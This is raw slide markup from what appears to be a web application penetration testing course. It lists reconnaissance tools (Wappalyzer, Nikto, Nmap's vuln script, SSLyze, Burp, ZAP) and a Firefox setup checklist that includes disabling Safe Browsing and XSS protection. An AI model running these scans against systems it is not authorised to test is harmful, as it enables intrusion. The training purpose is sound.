              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> or hostname&gt; --script vuln</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2830530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8946-A797-404B-BA71-B68BAAE0C4B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wappaylzer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C0251B2-E3BF-4E14-ADE9-807DDE7A174F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9212002" y="1811173"/>
            <a:ext cx="2666667" cy="780952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A584FCC4-CB1A-4A12-A316-65FD8FB80494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200722" y="1683834"/>
            <a:ext cx="8943278" cy="1415772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Identify technology on websites </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Wappalyzer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is a cross-platform utility that uncovers the technologies used on websites. It detects content management systems, ecommerce platforms, web frameworks, server software, analytics tools and many more.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88691C9A-1EED-4A71-A270-681B7F75026D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6634977" y="3049426"/>
            <a:ext cx="4966736" cy="3694436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3425908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69BC-1C21-4164-86D3-27EAFB138213}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nikto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD094A93-C650-4DE3-B6BB-B1BF33B79E9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Installation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E485860D-B772-4AA7-8D7A-10D1DC506F52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9126683" y="2262207"/>
            <a:ext cx="2455717" cy="4134308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7B47456-E492-40E2-9C86-F619FF2A54EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="474793" y="2262207"/>
            <a:ext cx="8456400" cy="4116291"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20028776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C013-1922-49A6-894A-7DA44045E89A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Weak Ciphers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10883434-A7FD-43BC-8FB2-36A98FEC77F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – ssl-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ciphers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>SSLyze</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Qualys SSL Labs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D77DADE9-25BF-48FA-99B0-F7E20A3594B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153485" y="4371668"/>
            <a:ext cx="3257143" cy="657143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F9EC04C-4D38-4C99-86A2-8A6C7D8FA51D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153485" y="3100428"/>
            <a:ext cx="3733333" cy="657143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E6F24DB-823B-4244-AA1D-24F7F5F34E3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153485" y="1592923"/>
            <a:ext cx="5371429" cy="1228571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19956031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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mapping -  Manual and Automated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Burp </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ZAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directory enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34052892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9033-D86E-4E40-BEC8-5074AC90B5AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27B20C72-A98F-4D47-AC4D-1815A4FA7B5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Chrome, Opera, Internet Explorer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plugins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wappalyzer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Foxy Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Agent Switcher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie Manager +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>About:cache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59302D54-CBC7-4036-82BB-42AB77F7535E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8027866" y="2185662"/>
            <a:ext cx="2380952" cy="2219048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E017E372-711A-494A-B214-3C6D0E5C70F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4758320"/>
            <a:ext cx="4885714" cy="1485714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="797052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77FF-74EB-4191-95FF-57590D2FAA15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack Vectors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB74DC55-2ADB-4E33-B2C3-BCFF8B5BB076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152299" y="1428082"/>
            <a:ext cx="11887401" cy="5353718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36185337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9033-D86E-4E40-BEC8-5074AC90B5AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27B20C72-A98F-4D47-AC4D-1815A4FA7B5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Chrome, Opera, Internet Explorer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>18 Extensions For Turning Firefox Into a Penetration Testing Tool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Towards a Quieter Firefox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1945727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9033-D86E-4E40-BEC8-5074AC90B5AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27B20C72-A98F-4D47-AC4D-1815A4FA7B5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1600201"/>
            <a:ext cx="10972800" cy="5079379"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Consider changing for testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1) Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>about:config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2) Disable Safe Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3) Disable Pipelining</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4) Disable Pre-fetching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5) Remove all bookmarks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6) Set homepage to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>about:blank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for startup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7) Make sure history is enabled, but disable search suggestions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8) Disable checking for updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>9) Just say no to helping developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>10) Disable updates for sync</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>11) Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>XXS protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or disable within Burp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24273309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75553-E7CA-4861-BDDC-7992792C6CE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Built in Developer Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
